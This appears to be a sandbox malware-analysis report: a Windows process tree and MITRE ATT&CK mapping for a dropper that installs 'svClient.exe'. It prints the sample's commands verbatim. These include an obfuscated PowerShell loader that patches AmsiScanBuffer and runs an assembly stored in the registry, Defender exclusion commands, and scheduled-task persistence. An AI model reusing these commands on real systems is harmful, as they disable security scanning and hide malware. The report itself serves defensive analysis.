C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1052
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HUkTTCrMpPRQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TaRDednpCXVIWZ,[Parameter(Position=1)][Type]$HZxeagLtqz)$zaglKlrGWZZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'du'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'ate'+[Char](84)+'y'+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+',A'+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$zaglKlrGWZZ.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+'eci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TaRDednpCXVIWZ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+'me'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$zaglKlrGWZZ.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'ok'+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+'S'+[Char](105)+'g'+','+'N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$HZxeagLtqz,$TaRDednpCXVIWZ).SetImplementationFlags('Ru'+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+','+'M'+'a'+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $zaglKlrGWZZ.CreateType();}$mOkECyansmghy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+'o'+''+'s'+'o'+'f'+'t'+'.'+''+'W'+'i'+'n'+'32'+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$dkKpfqLVEDqHAg=$mOkECyansmghy.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'ddr'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'t'+'a'+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dreUiNknXNAzzXArjbe=HUkTTCrMpPRQ @([String])([IntPtr]);$kExKzpJFCCBhVNcJxVSswP=HUkTTCrMpPRQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wPestcycRcC=$mOkECyansmghy.GetMethod('Ge'+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$fEAxLgqJZxzHTN=$dkKpfqLVEDqHAg.Invoke($Null,@([Object]$wPestcycRcC,[Object](''+[Char](76)+''+[Char](111)+'adL'+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$chogbGlfdYVFMMsjJ=$dkKpfqLVEDqHAg.Invoke($Null,@([Object]$wPestcycRcC,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$mRtEVlq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fEAxLgqJZxzHTN,$dreUiNknXNAzzXArjbe).Invoke('a'+'m'+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$MrbjCvqwKaCSzmckI=$dkKpfqLVEDqHAg.Invoke($Null,@([Object]$mRtEVlq,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$mvthIoxNUJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($chogbGlfdYVFMMsjJ,$kExKzpJFCCBhVNcJxVSswP).Invoke($MrbjCvqwKaCSzmckI,[uint32]8,4,[ref]$mvthIoxNUJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MrbjCvqwKaCSzmckI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($chogbGlfdYVFMMsjJ,$kExKzpJFCCBhVNcJxVSswP).Invoke($MrbjCvqwKaCSzmckI,[uint32]8,0x20,[ref]$mvthIoxNUJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+'WA'+[Char](82)+''+'E'+'').GetValue(''+[Char](115)+''+[Char](118)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1332

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1132

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2864

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3332

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3416
- C:\Users\Admin\AppData\Local\Temp\ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe
  "C:\Users\Admin\AppData\Local\Temp\ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Users\Public\svClient.exe
    "C:\Users\Public\svClient.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFD4C.tmp.bat""
      4⤵
      PID:3160
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2604
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2496
    - - C:\Users\Admin\svClient\svClient.exe
        
        "C:\Users\Admin\svClient\svClient.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4380
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN svClient.exe
        6⤵
        
        PID:5056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4484
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "svClient.exe" /TR "C:\Users\Admin\svClient\svClient.exe \"\svClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2700
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN svClient.exe
        6⤵
        
        PID:2832
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc hourly /mo 1 /tn "svClient_Task-HOURLY-01" /tr "%MyFile%" /st 00:00
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\svClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4524
- - C:\Users\Public\sv.exe
    "C:\Users\Public\sv.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\sv.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:5088

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3440

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3544

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4660

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2612

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 81f5e01d44bc9ba99745e02eae6b9ff7 vXmy8xMKLk+wLqGyovnvWw.0.1.0.0.0
1⤵
PID:4584
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5040

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:4536

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4868

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1852

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery